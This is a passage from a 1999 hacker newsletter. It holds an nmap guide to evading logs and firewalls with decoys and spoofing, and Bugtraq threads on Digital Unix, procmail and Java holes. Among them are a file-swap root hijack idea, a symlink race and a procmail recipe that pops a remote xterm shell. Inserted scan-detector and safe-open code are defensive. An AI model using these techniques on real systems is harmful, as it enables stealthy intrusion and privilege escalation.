       immediately afterwards, e.g. -PT32523 will ACK ping port 32523.  Picking a
       random high-numbered port in this way may work *much* better than the
       default NMAP behavior of ACK pinging port 80.  This is because many packet
       filter rules are setup to let through all packets to high numbered ports
       with the ACK bit set, but sites may filter port 80 on every machine other
        than their publicly accessible webservers.  You can also do both an ICMP
       ping scan and an ACK scan to a high numbered port with, e.g. -PB32523.  
       However, if a site has a really, really intelligent firewall that
       recognizes that your ACK packet isn't part of an ongoing TCP connection it
       might be smart enough to block it.  For that reason, you may get better
       results with a TCP SYN sweep with -PS.  In this case, scanning a
       high-numbered port will probably not work, and instead you need to pick a
       port which is likely to get through a firewall. Port 80 is not a bad pick,
       but something like ssh (port 22) may be better.
       
       So the first question to ask yourself is if you care about wasting time
       scanning machines which are not up and if you care about getting really
       complete coverage of the network?  If you don't care about wasting time
       and really want to hit all the machines on a network, then use -P0.  
       Pinging machines will only cause you to have more of a signature in any
       log files and will eliminate machines which might possibly be up.  Of
       course, you will waste time scanning all the IP numbers which aren't
       assigned.
       
       If you do ping machines, an ICMP ping sweep is probably more likely to be
       missed or ignored by system administrators.  It doesn't look all that
       hostile. If you think you're up against a firewall you should experiment
       with which kinds of pings seem to get through it.  Do ICMP pings work at
        all?  Can you ping their webserver?  If not, then don't bother with ICMP
        pings.  Can you ACK ping their webserver?  If not, then you have to go
       with SYN pings.
       
       What if all you want to do is a ping scan?  Then use -sP.
       
       Port Scanning
       
       The vanilla scan is a TCP connect() scan (-sT).  These are loggable.  You
       probably don't want to do these.
       
       SYN scans (-sS) are the workhorse of scanning methods.  They are also
       called "half-open" scans because you simply send a SYN packet, look for
       the return SYN|ACK (open) or RST (closed) packet and then you tear down
        the connection before sending the ACK that would normally finish the TCP
       3-way handshake. These scans don't depend on the characteristics of the
       target TCP stack and will work anytime a connect() scan would have worked.  
       They are also harder to detect -- TCP-wrappers or anything outside of the
       kernel shouldn't be able to pick up these scans -- packet filters like
       ipfwadm or a firewall can though.  If a box is being filtered NMAP's SYN
       scan will detect this and report ports which are being filtered.
       
       FIN (-sF), NULL (-sN) and XMAS (-sX) scans are all similar.  They all rely
       on RFC-compliance and as such don't work against boxes like Win95/98/NT or
       IRIX.  They also work by getting either a RST back (closed port) or a
       dropped packet (open port).  Of course, the other situation where you
       might get back a dropped packet is if you've got a packet filter blocking
       access to that port.  In that case you will get back a ton of false open
       ports. A few years back these kinds of scans might have been stealthy and
       undetectable.  These days they probably aren't.
       
       You can combine any of the SYN, FIN, NULL or XMAS scans with the (-f) flag
       to get a small fragment scan.  This splits the packet which is sent into
       two tiny frags which can sometimes get through firewalls and avoid
       detection.  Unfortunately, if you're not running a recent version of an
       open source O/S (Linux or Net/Open/FreeBSD) then you probably can't frag
        scan due to the implementation of SOCK_RAW on most unixes (Solaris, SunOS,
       IRIX, etc).  See Fyodor's NMAP portability chart to see if -f is supported
       on your platform.
       
       For the initiated out there, you could modify libpcap to allow you to send
       packets in addition to sniffing them by opening the packet capture device
       rw instead of ro.  Then you need to build a link-layer (probably ethernet)
        header and then you could implement your own frag scanner.  For bonus
        points implement all of the different SYN, FIN, NULL and XMAS scans *and*
       allow for sending the fragments out in reverse order (which helps for
       getting through firewalls).  This hasn't been done (yet) in NMAP due to
       the fact that NMAP needs to support multiple different link layer
       interfaces (not just ethernet) and needs code for dealing with ARP.  If
       anyone wants to code this up, I'm sure that people would appreciate it.
       
       UDP scanning (-sU) in NMAP has the same problem as FIN scans in that
       packet filtered ports will turn up as being open ports.  It also runs
       extremely slowly against machines with UDP packet filters.
       
       Another type of scan is the bounce scan (-b <ftp_relay_host>) which, if
       there is insufficient logging on the ftp host you're using to bounce, is
       completely untraceable.  Recent FTP servers shouldn't let you do these
       kinds of scans.
       
       The last scanning option that I'm going to mention is identd scanning (-I)
       which only works with TCP connect scans (-sT).  This will let you know the
       owner of the daemon which is listening on the port.  Provided, of course,
       that the site is running identd and is not doing something intelligent
       like using a cryptographic hash (i.e. pidentd -C).  You *have* to make
       complete 3-way TCP handshakes for this to work, so this is not very
       stealthy.  It does, however, give you a lot of information.  It only works
       against machines that have port 113/auth open.
       
       Source IP Deception
       
       You can also take advantage of the fact that you can change your source
       address.  The simplest way to do this is with -S <ip>.  If you are on a
       broadcast ethernet segment you could change your source address to an IP
       which doesn't exist and then you simply sniff the network for the reply
       packets.  And if you are not on a leaf node/network then as long as the
       reply packet will get routed by you, you can use it.  To turn this on its
       head:  the next time you get scanned, do a traceroute on the machine that
       scanned you.  Any of the machines on any of the networks that those
       packets went through could have been the machine which was *really*
       scanning you.
       
       The other deceptive measure is to use decoy scans.  You spoof a ton of
       scans originating from decoy machines and insert your IP in the middle of
       it somewhere.  The admin at the site you are scanning is presented with X
       number of scans and no way to determine which one actually did it.  For
       bonus points, combine this with the previous tactic and spoof an IP
       address which doesn't exist.  If you don't spoof your own IP address make
       sure to use "likely" decoys -- use machines which were connected to the
       net at the time you made your scans and don't use sites like
       www.microsoft.com.  Ideally you want a lot of linux boxes as decoys.  The
       more decoys the better, but obviously the slower the scan will go.
       
       [ QUESTION: do decoy/spoof scans also decoy/spoof the ping scan?  can you
         combine decoy scans and "ME" spoofing like this?  does a decoy/spoof scan
         also decoy/spoof the OSscan? ]
       
       OS scanning
       
       This is the -O option.  To use it requires one open and one closed port.  
       The closed port is picked at random from a high-numbered port.  Machines
       which do packet filtering on high-numbered ports will cause problems with
       OS detection (many sites will filter packets to high numbered ports which
       don't have the ACK bit set).  Also excessive packet loss will cause
       problems with OS detection.  If you run into trouble try selecting an open
       port which isn't being served by inetd (e.g. ssh/22 or
       portmap/rpcbind/111).
       
       OS scanning also reports the TCP sequence number prediction vulnerability
       of the system.  If you're 31337 you will be able to use this to exploit
       trust relationships between this machine and other machines.  There's a
       reasonably decent phrack article on this in phrack P48-14, but you should
       beware that it isn't this easy -- you need to worry about ARP (what's
       that?  how does it work?  i suggest familiarizing yourself with tcpdump)
       and if you're trying to exploit rsh/rlogin you need to worry about
       spoofing the authorization connection as well.
       
       
       -- 
       Lamont Granquist                       lamontg@genome.washington.edu
       Dept. of Molecular Biotechnology       (206)616-5735  fax: (206)685-7344
       Box 352145 / University of Washington / Seattle, WA 98195
       PGP pubkey: finger lamontg@raven.genome.washington.edu | pgp -fka
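        The guide above is written from the scanner's side. As an added example (not
        part of Lamont's text), here is the defender's side of the same scans: a
        detector that reads packet-filter log lines and flags a source that hit many
        ports on one host (a port scan) or many hosts (a ping sweep, whether by ICMP
        echo or by the TCP ACK/SYN "ping" the guide describes). The sample lines are
        constructed in the style of ipchains -l output ("... PROTO=<n> src:sport
        dst:dport ..."), not a captured log, and the thresholds are assumptions to
        tune for your own network.

```shell
# Added example, not part of Lamont's guide: the admin's side of the
# scans it describes. detect_scans reads packet-filter log lines (the
# sample is constructed in the style of ipchains -l output:
# "... PROTO=<n> src:sport dst:dport ...") and reports a source that
# hit many ports on one host (port scan) or many hosts (ping sweep,
# by ICMP echo or by TCP ACK/SYN "ping"). Thresholds are assumptions.
SCAN_PORTS=${SCAN_PORTS:-5}    # distinct ports on one host from one source
SWEEP_HOSTS=${SWEEP_HOSTS:-4}  # distinct hosts touched by one source

# detect_scans: log lines on stdin, findings on stdout (sorted).
detect_scans() {
    awk -v pth="$SCAN_PORTS" -v hth="$SWEEP_HOSTS" '
    /PROTO=/ {
        for (i = 1; i <= NF; i++)
            if ($i ~ /^PROTO=/) { proto = substr($i, 7); src = $(i + 1); dst = $(i + 2) }
        split(src, s, ":"); split(dst, d, ":")
        # one entry per (source, target, port); ICMP carries type/code, not ports
        if (proto != "1") {
            k = s[1] SUBSEP d[1] SUBSEP d[2]
            if (!(k in seen)) { seen[k] = 1; ports[s[1] SUBSEP d[1]]++ }
        }
        h = s[1] SUBSEP d[1]
        if (!(h in hseen)) { hseen[h] = 1; hosts[s[1]]++ }
    }
    END {
        for (k in ports) if (ports[k] >= pth) {
            split(k, p, SUBSEP)
            print "PORTSCAN " p[1] " -> " p[2] " (" ports[k] " ports)"
        }
        for (h in hosts) if (hosts[h] >= hth)
            print "SWEEP " h " (" hosts[h] " hosts)"
    }' | sort
}

# sample_fw_log: constructed lines, not a captured log.
sample_fw_log() {
    cat <<'EOF'
Apr  5 16:50:01 pestilence kernel: Packet log: input DENY eth0 PROTO=6 10.9.8.7:40001 194.1.2.3:21 L=40 S=0x00 I=1 F=0x0000 T=64 SYN (#3)
Apr  5 16:50:01 pestilence kernel: Packet log: input DENY eth0 PROTO=6 10.9.8.7:40002 194.1.2.3:22 L=40 S=0x00 I=2 F=0x0000 T=64 SYN (#3)
Apr  5 16:50:01 pestilence kernel: Packet log: input DENY eth0 PROTO=6 10.9.8.7:40003 194.1.2.3:23 L=40 S=0x00 I=3 F=0x0000 T=64 SYN (#3)
Apr  5 16:50:02 pestilence kernel: Packet log: input DENY eth0 PROTO=6 10.9.8.7:40004 194.1.2.3:25 L=40 S=0x00 I=4 F=0x0000 T=64 SYN (#3)
Apr  5 16:50:02 pestilence kernel: Packet log: input DENY eth0 PROTO=6 10.9.8.7:40005 194.1.2.3:80 L=40 S=0x00 I=5 F=0x0000 T=64 SYN (#3)
Apr  5 16:50:02 pestilence kernel: Packet log: input DENY eth0 PROTO=6 10.9.8.7:40006 194.1.2.3:110 L=40 S=0x00 I=6 F=0x0000 T=64 SYN (#3)
Apr  5 16:50:03 pestilence kernel: Packet log: input DENY eth0 PROTO=6 10.9.8.7:40007 194.1.2.3:21 L=40 S=0x00 I=7 F=0x0000 T=64 SYN (#3)
Apr  5 16:51:10 pestilence kernel: Packet log: input DENY eth0 PROTO=1 10.5.5.5:8 194.1.2.1:0 L=28 S=0x00 I=8 F=0x0000 T=64 (#1)
Apr  5 16:51:10 pestilence kernel: Packet log: input DENY eth0 PROTO=1 10.5.5.5:8 194.1.2.2:0 L=28 S=0x00 I=9 F=0x0000 T=64 (#1)
Apr  5 16:51:10 pestilence kernel: Packet log: input DENY eth0 PROTO=1 10.5.5.5:8 194.1.2.3:0 L=28 S=0x00 I=10 F=0x0000 T=64 (#1)
Apr  5 16:51:10 pestilence kernel: Packet log: input DENY eth0 PROTO=1 10.5.5.5:8 194.1.2.4:0 L=28 S=0x00 I=11 F=0x0000 T=64 (#1)
Apr  5 16:51:11 pestilence kernel: Packet log: input DENY eth0 PROTO=6 10.5.5.5:51000 194.1.2.5:80 L=40 S=0x00 I=12 F=0x0000 T=64 ACK (#2)
Apr  5 16:52:00 pestilence kernel: Packet log: input DENY eth0 PROTO=6 10.1.1.1:1025 194.1.2.3:22 L=60 S=0x00 I=13 F=0x4000 T=64 SYN (#3)
EOF
}
```

        Note what the detector cannot do: with the decoy option the source column
        holds the decoys as well as the real scanner, and with -P0 plus a slow scan
        the counts may never cross the thresholds inside one log file, so feed it
        the logs of the whole day, not the last hour.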
       
       
       @HWA     
       
  36.0 Digital Unix 4.0 has potential root compromise in /var perms
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Sun, 4 Apr 1999 20:31:12 +0300
       From: Harhalakis Stefanos <v13@AETOS.IT.TEITHE.GR>
       To: BUGTRAQ@netspace.org
       Subject: Digital Unix 4.0E /var permission
       
         On Digital Unix 4.0E with the latest patch kit applied, after a new
       installation /var has g+w for group system. Anyone that can crack any
       account with gid==system may exploit this (not tested but there should be
       no problem with mv'ing /var/sbin, /var/adm etc etc..). It seems that CDE
       is forcing g+w to /var.. The whole thing is done while executing
       /sbin/rc3.d/S95xlogin and only if CDE is selected.
       
       <<V13>>
       
       -------------------------------------------------------------------------
       
       Date: Tue, 6 Apr 1999 10:47:26 +0200
       From: Jochen Thomas Bauer <jtb@THEO2.PHYSIK.UNI-STUTTGART.DE>
       To: BUGTRAQ@netspace.org
       Subject: Re: Digital Unix 4.0E /var permission
       
       Hello,
       
       On Sun, 4 Apr 1999 Harhalakis Stefanos wrote:
        >On Digital Unix 4.0E with the latest patch kit applied, after a new
       >installation /var has g+w for group system.
       
       This problem seems to exist in other versions of Digital Unix, too.
       At least on Digital Unix 4.0c and 4.0d (Factory Installed Software,
       no patches applied, CDE in use) /var, which in my case is a link to
       /usr/var, has
       
       drwxrwxr-x  28 root     system       512 Feb 11 12:58 /usr/var/
       
       permissions. However, on Digital Unix 4.0b (Patch kit DUV40BAS00008-
       19980821 applied, Software installed from CD, CDE in use) /usr/var
       has
       
       drwxr-xr-x  23 root     system       512 Feb 11  1998 /usr/var/
       
       permissions.
       
       >The whole thing is done while executing /sbin/rc3.d/S95xlogin and
       >only if CDE is selected.
       
       This does not seem to be the case for Digital Unix 4.0c and 4.0d.
       There is no chmod of /var in /sbin/rc3.d/S95xlogin.
       
       >Anyone that can crack any account with gid==system may exploit this
       >(not tested but there should be no problem with mv'ing /var/sbin,
       >/var/adm etc etc..).
       
       Or do the following:
       CDE's Xconfig file is a link from /var/dt/Xconfig to the actual config
       file. Moving /var/dt and creating your own /var/dt, you could replace
       the system Xconfig file with your own version which has the session
       manager specification
       
       Dtlogin*session:               /usr/dt/bin/Xsession
       
       replaced with something more evil. Then just wait for root to
       log in on the console....
       
       --
       Jochen Bauer
       Institute for Theoretical Physics
       University of Stuttgart
       Germany
       
       PGP public key available from:
       http://www.theo2.physik.uni-stuttgart.de/jtb.html
       
       -------------------------------------------------------------------------
       
       Date: Tue, 6 Apr 1999 10:18:28 -0500
       From: implosion <implosion@BROKEN.NE.MEDIAONE.NET>
       To: BUGTRAQ@netspace.org
       Subject: Re: Digital Unix 4.0E /var permission
       
               First of all, under Digital UNIX, the system group is the group that is
        'pseudo-root', i.e. have near root privileges and are allowed to su into
       root.  /var, which under a default install, is a sym-link to /usr/var,
       contains all of the system accounting files, LSM, and other system
        specific files that all System Administrators would need to run their
       system.  So, it is only logical that system have write permissions to that
       directory.
               Also, one should note that any system administrator should (and
       would, I would hope), only put _secure_ accounts in the system group, i.e.
       any account that is going to utilize a safe password and those accounts
       are not going to have set-uid or gid executables attached to them.
               One more note:  as an ls -la of /sbin/rc3.d would show you,
       S95xlogin is only a sym-link to /sbin/init.d/xlogin.  The S95 is there so
       when init comes up to run level 3, it will start (the  S tells it that),
        and the 95 is placed there to put it in order - you add a number
       to the front of the executable, so when the rc3 script processes
       /sbin/rc3.d, it gets launched after certain daemons and programs that need
       to be running in order for it to start. To the best of my knowledge,
        xlogin isn't doing anything to the /var permissions.
       
       -Implosion
       
       
        On Sun, 4 Apr 1999, Harhalakis Stefanos wrote:
       
        >  On Digital Unix 4.0E with the latest patch kit applied, after a new
       > installation /var has g+w for group system. Anyone that can crack any
       > account with gid==system may exploit this (not tested but there should be
       > no problem with mv'ing /var/sbin, /var/adm etc etc..). It seems that CDE
       > is forcing g+w to /var.. The whole thing is done while executing
       > /sbin/rc3.d/S95xlogin and only if CDE is selected.
       >
       > <<V13>>
       >
       
       
       @HWA
       
  37.0 Running Procmail <v3.l2? time to upgrade...(overflow conditions)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Mon, 5 Apr 1999 02:23:59 -0500
       From: Philip Guenther <guenther@GAC.EDU>
       To: BUGTRAQ@netspace.org
       Subject: Re: [SECURITY] new version of procmail with security fixes
       
       debian-security-announce@LISTS.DEBIAN.ORG writes:
       >A new version of procmail has been released which fixes a couple
       >of buffer overflows and has extra security checks.
       >
       >We recommend you upgrade your procmail package immediately.
       
       As the person who fixed most of those overflows I suppose I should
       elaborate on this.
       
       First off, for non-debian users, the source to the current procmail
       release can be fetched from:
       
               http://www.procmail.org/procmail.tar.gz
               ftp://ftp.procmail.org/pub/procmail/procmail.tar.gz
       
       PGP signatures can be found next to the those (".sig"), made by the key
        with keyid 0x4A25D351, available on the keyservers or at
               http://www.procmail.org/pgp-key.html
       
       Mirrors will be announced on the procmail webpage
       (http://www.procmail.org/) as they are confirmed.
       
       
       All versions of procmail previous to 3.12 could overflow heap allocated
       buffers, either when given a sufficiently long command line argument,
       or during expansions while processing procmailrc files.  If the latter
       occurs during the processing of /etc/procmailrc on systems where
       procmail is installed setuid root or is run as the local delivery
       agent, root access may be obtainable.  If procmail is installed setgid,
       then the command line overflow exposes that group, but not (directly)
       root.  Overflows that occur while processing user procmailrc files may
       give out setgid and/or that user's access.
       
       
       The details are similar to any other program with heap-allocated buffer
       overflow.  None of the overflows directly involved the message being
       processed, but rather were triggered by expansions in the user's
       procmailrc file.  Since only the user can change that, there should be
       no problem...except that:
       
       a) procmail is installed setgid mail on many systems and (depending on
          the spool configuration and system) may not have given up those
          privileges, and
       b) many rcfiles extract data from the message (say, the contents of a
          header, or a snippet of the body) and then use that in later
          conditions.
       
       (a) means that a local user may be able to obtain setgid mail rights,
       while (b) means that remote exploits may be possible.  However, even
       when self-inflicted with no gain, crashing on overflow is just rude.
       
       Closing the overflows has been a matter of simply checking, in the
       correct places, that there's enough space to do what needs to be done.
       While I can't rule out doing so in the future, we have not moved to a
       scheme of dynamically allocating everything, partly because I don't
       have the time to debug such a scheme, and partly because it isn't clear
       that it would even be the right thing to do (think DOS-attacks).
       
       I'm not claiming to have fixed them all -- I've been following this
       list too long to be that stupid -- but we have our eyes open and are
       actively working on catching them when we find them.  Bug reports and
       comments should be sent to <bug@procmail.org>.
       
       I have not heard of or seen any exploits.  (Waste of typing to say that.)
       
       
       Philip Guenther
       
       ----------------------------------------------------------------------
       guenther@gac.edu                UNIX Systems and Network Administrator
       Gustavus Adolphus College       St. Peter, MN 56082-1498
       Source code never lies: it just misleads (Programming by Purloined Letter?)
       
       --------------------------------------------------------------------------------
       
       Date: Tue, 6 Apr 1999 16:56:16 -0500
       From: Philip Guenther <guenther@GAC.EDU>
       To: BUGTRAQ@netspace.org
       Subject: Procmail version 3.13.1 released
       
       How apt my previous words...
       
       I have released procmail version 3.13.1, which fixes a few buffer
       overflows that I had missed previously and eliminates a keyword conflict
       with newer versions of gcc.  These buffer overflows are probably
       'slightly more difficult' to exploit as they involve particular
       variables instead of variable expansion in general.
       
       My apologies to those who downloaded version 3.13 yesterday.
       
       
               http://www.procmail.org/procmail.tar.gz
               ftp://ftp.procmail.org/pub/procmail/procmail.tar.gz
       
       
       Debian has been notified and so will probably be releasing an updated
       package shortly.  (If other vendors want to be notified of procmail
       releases ahead of time they should e-mail me.)
       
       
       Philip Guenther
       
       Procmail Maintainer
       bug@procmail.org
       
       
       @HWA               
       
  37.1 More Procmail problems
       ~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Mon, 5 Apr 1999 19:40:37 +0100
       From: Chris Evans <chris@FERRET.LMH.OX.AC.UK>
       To: BUGTRAQ@netspace.org
       Subject: More procmail
       
       Hi,
       
       Well, well, since Debian appear to have "broken silence" on the procmail
       front rather than wait for an official announcement...
       
       I found something potentially more serious than boring heap overflows. It
       is allegedly fixed in the latest procmail release but I haven't checked.
       
       As a summary, local users can dump the contents of any file to screen. As a
       comment I would suggest anyone running procmail with elevated privs either
       
       a) Needs their head examined or
       b) Hasn't read the code.
       
       Here is a quote of a previous mail I sent various people when I first
       found the file handling issue. I also recommended to the procmail team
       that they review _all_ of their file handling code. I have no idea whether
       this recommendation was taken on board or not.
       
       Cheers
       Chris
       
       -----8<--------
       
       However on to more interesting things, I have found a much more serious
       security hole in procmail's file handling which can lead to users dumping
       the contents of arbitrary files they should not be able to read to the
       screen.
       
       The faulty code sequence is in the handling of .procmailrc files and goes
       something like
       
       1) stat .procmailrc (as root) - if it can't be stat'ed keep root privs
       2) open .procmailrc
       3) do lstat on .procmailrc for security check
       
       By replacing .procmailrc after steps 1) and 2) with a symlink to the file
       to dump and a regular file respectively, we can win a race condition.
       
       You might not think this is a very plausible race but with a few deep
       directory/multiple symlink tricks/SIGSTOP/etc. the window can be made
       quite wide. This is definitely exploitable.
       
       ----------------------------------------------------------------------------
       
       Date: Tue, 6 Apr 1999 21:50:03 -0400
       From: Kragen Sitaker <kragen@POBOX.COM>
       To: BUGTRAQ@netspace.org
       Subject: Re: more procmail
       
       Chris Evans writes:
       > As a comment I would suggest anyone running procmail with elevated
       > privs either
       >
       > a) Needs their head examined or
       > b) Hasn't read the code.
       
       Procmail is generally not useful when running on behalf of the person
       who wrote the email it's being given as input.
       
       When it is running on behalf of someone else, which is the usual case,
       it has privileges that the sender did not.
       
       In my book, that means it's running with elevated privs.
       
       Common examples of this situation:
       - filtering your incoming mail with procmail
       - running a mailbox (of mail from other people) through procmail
       
       --
       <kragen@pobox.com>       Kragen Sitaker     <http://www.pobox.com/~kragen/>
       This is exactly how the World Wide Web works: the HTML files are the pithy
       description on the paper tape, and your Web browser is Ronald Reagan.
         -- Neal Stephenson, at http://www.cryptonomicon.com/beginning_print.html
       
       ----------------------------------------------------------------------------
       
       Date: Tue, 6 Apr 1999 20:00:03 -0500
       From: Philip Guenther <guenther@GAC.EDU>
       To: BUGTRAQ@netspace.org
       Subject: Re: More procmail
       
       Chris Evans <chris@FERRET.LMH.OX.AC.UK> writes:
       ...
       >As a summary, local users can dump the contents of any file to screen. As a
       >comment I would suggest anyone running procmail with elevated privs either
       >
       >a) Needs their head examined or
       >b) Hasn't read the code.
       >
       >Here is a quote of a previous mail I sent various people when I first
       >found the file handling issue. I also recommended to the procmail team
       >that they review _all_ of their file handling code. I have no idea whether
       >this recommendation was taken on board or not.
       
       Hmm, I guess I failed to cc you on the discussion that later took place
       on this issue.  What we eventually settled on and was incorporated into
       version 3.12 was for procmail to always open user rcfiles as the user
       (/etc/procmailrc will still be opened and processed as root).  On some
       systems where special group privileges are needed to deliver to the
       mailspool but that have broken set*gid() system calls, procmail will
       attempt the open as root and if it succeeds then it'll close it, become
       the user, and open it again.  This last case may still allow for DOS
       attacks by symlinking to, say, a serial device that blocks on open, so
       I suppose the open as root should be a non-blocking open.  The truly
       paranoid will abolish the central mailspool directory and group 'mail'
       in favor of spooling mail to the user's home directory, a setup
       procmail readily supports.
       
       As for the rest of the file handling code, what I've had the time to
       review has looked safe.  Procmail becomes the user before it starts
       processing the contents of the $HOME/.procmailrc, so problems should be
       limited to what the user could have done without procmail at all.
       While the permissions of the $HOME/.procmailrc are checked closely,
       procmail tries to trust the user the rest of the time; if the user
       wants to process recipes from someone else's rcfile, procmail will let
       them: trusting the other user was their explicit choice.  Resource
       consumption attacks (say, opening /dev/zero as an rcfile) should be
       dealt with like all resource consumption attacks: audit and keep a
       baseball bat next to your desk.
       
       
       Philip Guenther
       Procmail Maintainer
       bug@procmail.org
       
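       A TOCTOU-free way to open a user rcfile, written here as an added C example
       (not procmail's own code): it replaces the stat/open/lstat sequence from
       Chris Evans's post with a single open() using O_NOFOLLOW and O_NONBLOCK (the
       non-blocking open Philip Guenther suggests for the blocking-device case)
       followed by fstat() on the descriptor, so every check is made on the object
       actually opened. The function names, the rc_err enum, the /tmp demo
       directory and the rcfile text are assumptions of the example; the caller is
       assumed to have already dropped privileges to the user, as the reply above
       says procmail 3.12 does for user rcfiles.

```c
#define _GNU_SOURCE 1          /* for mkdtemp(), symlink(), O_NOFOLLOW */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Why an rcfile was refused. RC_OK means the descriptor is usable. */
enum rc_err {
    RC_OK = 0,
    RC_OPEN_FAILED,          /* open()/fstat() failed; on a symlink Linux gives ELOOP */
    RC_NOT_REGULAR,          /* device, FIFO, directory: not a file we want to read */
    RC_WRONG_OWNER,          /* not owned by the user whose rcfile it claims to be */
    RC_WRITABLE_BY_OTHERS    /* group/world writable: someone else can plant recipes */
};

/* Open `path` as the rcfile of user `owner` without a check-then-use window.
 * Returns a descriptor >= 0, or -1 with *why set. The caller is assumed to
 * have already dropped privileges to `owner`; because the checks below are on
 * the opened object, replacing the name between calls gains nothing. */
int open_rcfile_checked(const char *path, uid_t owner, enum rc_err *why)
{
    struct stat st;
    int flags;
    /* O_NOFOLLOW: a symlink at the final component makes open() fail.
     * O_NONBLOCK: a device that blocks on open cannot hang mail delivery.
     * O_NOCTTY:   a terminal device cannot become our controlling tty. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_NOCTTY);
    if (fd < 0) { *why = RC_OPEN_FAILED; return -1; }

    /* fstat() describes what we hold, unlike stat()/lstat() on the name. */
    if (fstat(fd, &st) < 0)               { close(fd); *why = RC_OPEN_FAILED; return -1; }
    if (!S_ISREG(st.st_mode))             { close(fd); *why = RC_NOT_REGULAR; return -1; }
    if (st.st_uid != owner)               { close(fd); *why = RC_WRONG_OWNER; return -1; }
    if (st.st_mode & (S_IWGRP | S_IWOTH)) { close(fd); *why = RC_WRITABLE_BY_OTHERS; return -1; }

    /* O_NONBLOCK was only wanted for the open() itself; reads should block. */
    flags = fcntl(fd, F_GETFL);
    if (flags >= 0) fcntl(fd, F_SETFL, flags & ~O_NONBLOCK);
    *why = RC_OK;
    return fd;
}

/* Convenience wrapper: just the verdict, descriptor closed again. */
enum rc_err check_rcfile_status(const char *path, uid_t owner)
{
    enum rc_err why;
    int fd = open_rcfile_checked(path, owner, &why);
    if (fd >= 0) close(fd);
    return why;
}

/* Self-contained demo on constructed files in a fresh temp directory:
 * returns 1 when a regular 0600 rcfile is accepted and a symlink to it
 * (standing in for the race-window substitution) is refused, else 0. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/rcdemoXXXXXX";          /* constructed demo location */
    char regular[64], lnk[64];
    enum rc_err why;
    int ok = 0, fd;
    FILE *f;

    if (mkdtemp(dir) == NULL) return 0;
    snprintf(regular, sizeof regular, "%s/.procmailrc", dir);
    snprintf(lnk, sizeof lnk, "%s/.procmailrc.link", dir);

    f = fopen(regular, "w");
    if (f == NULL) goto cleanup;
    fputs(":0\n* ^Subject: demo\ndemo/\n", f);  /* constructed rcfile text */
    fclose(f);
    chmod(regular, 0600);

    fd = open_rcfile_checked(regular, getuid(), &why);
    if (fd >= 0 && why == RC_OK) { close(fd); ok = 1; }

    if (symlink(regular, lnk) != 0) { ok = 0; goto cleanup; }
    fd = open_rcfile_checked(lnk, getuid(), &why);
    if (fd >= 0 || why != RC_OPEN_FAILED) ok = 0;  /* symlink must be refused */
    if (fd >= 0) close(fd);
    unlink(lnk);

cleanup:
    unlink(regular);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("regular rcfile accepted, symlink refused: %s\n",
           demo_symlink_refused() ? "yes" : "no");
    return 0;
}
```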
       ----------------------------------------------------------------------------
       
       Date: Wed, 7 Apr 1999 08:50:28 -0700
       From: Ricky Connell <ricky@BEIDA.STANFORD.EDU>
       To: BUGTRAQ@netspace.org
       Subject: Re: More procmail
       
       Philip Guenther <guenther@GAC.EDU> writes:
       =Procmail becomes the user before it starts
       =processing the contents of the $HOME/.procmailrc, so problems should be
       =limited to what the user could have done without procmail at all.
       
               Not quite true.
               The procmail rule:
       
       :0
       * ^Subject: HACK
       | setenv DISPLAY beida:0;/usr/openwin/bin/xterm -e /bin/csh
       
               will, in fact, pop a shell from the secured mail server to wherever
       the user specifies, running as the user.  So if they control their own
       .procmailrc, they can log into the mail server whenever they desire, which
       may not be a machine that they would normally have access to.  The paths
       may need to be changed to reflect the OS of the mail server.
               I have patched my procmail to deal with this by forcing it to use
       smrsh.  In doing so, I also discovered that procmail calls sendmail
       explicitly at some point in its operation (didn't take the time to figure
       out where it does it).  This might also be of concern, but it wasn't
       immediately obvious to me how this might be exploited.
               -- Ricky
       
       
       ---
       ricky@smi.stanford.edu                          (650) 498-4405
                       Unix and Network Administrator
       
       
       @HWA       
               
  38.0 Security hole in Java 2 (and JDK 1.1.x)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Mon, 5 Apr 1999 08:56:10 -0400
       From: Gary McGraw <gem@RSTCORP.COM>
       To: BUGTRAQ@netspace.org
       Subject: Security Hole in Java 2 (and JDK 1.1.x)
       
       Hi all,
       
       Karsten Sohr at the University of Marburg in Germany (email
       sohr@mathematik.uni-marburg.de) has discovered a very serious security
       flaw in several current versions of the Java Virtual Machine,
       including Sun's JDK 1.1 and Java 2 (a.k.a. JDK 1.2), and Netscape's
       Navigator 4.x.  (Microsoft's latest JVM is not vulnerable to this
       attack.)  The flaw allows an attacker to create a booby-trapped Web
       page, so that when a victim views the page, the attacker seizes
       control of the victim's machine and can do whatever he wants,
       including reading and deleting files, and snooping on any data and
       activities on the victim's machine.
       
       The flaw is in the "byte code verifier" component of the JVM.  Under
       some circumstances the verifier fails to check all of the code that is
       loaded into the JVM.  Exploiting the flaw allows the attacker to run
       code that has not been verified.  This code can set up a type
       confusion attack (see our book "Securing Java" for details
       http://www.securingjava.com) which leads to a full-blown security
       breach.
       
       We have verified that the flaw exists and is serious.  Attack code (in
       both applet and application form) has been developed in the lab to
       exploit the flaw.  Sun and Netscape have been notified about the flaw
       and they are working on a fix.
       
       The attack we developed in the lab worked against the following platforms:
       JDK 1.1.5 (Solaris)
       JDK 1.2beta4 (Solaris)
       JDK 1.1.6 (Solaris)
       JDK 1.1.7 (FreeBSD)
       JDK 1.2 (NT)
       JDK 1.1.6 (NT)
       Symantec Visual Cafe Version 3
       Netscape 4.5 (FreeBSD)
       Netscape 4.5 (NT)
       Netscape 4.05 (NT)
       Netscape 4.02 (Solaris)
       Netscape 4.07 (Linux)
       
       The attack did not work against:
       Microsoft Visual J++ 6.0
       
       Kudos to Viren Shah at RST for extensive platform testing.  Thanks for
       your interest in mobile code security.
       
       Dr. Gary McGraw                      Prof. Edward W. Felten
       Reliable Software Technologies       Secure Internet Programming Lab
       gem@rstcorp.com                      Dept. of Computer Science
                                            Princeton University
       http://www.securingjava.com          felten@cs.princeton.edu
       
       ---------------------------------------------------------------------------
       
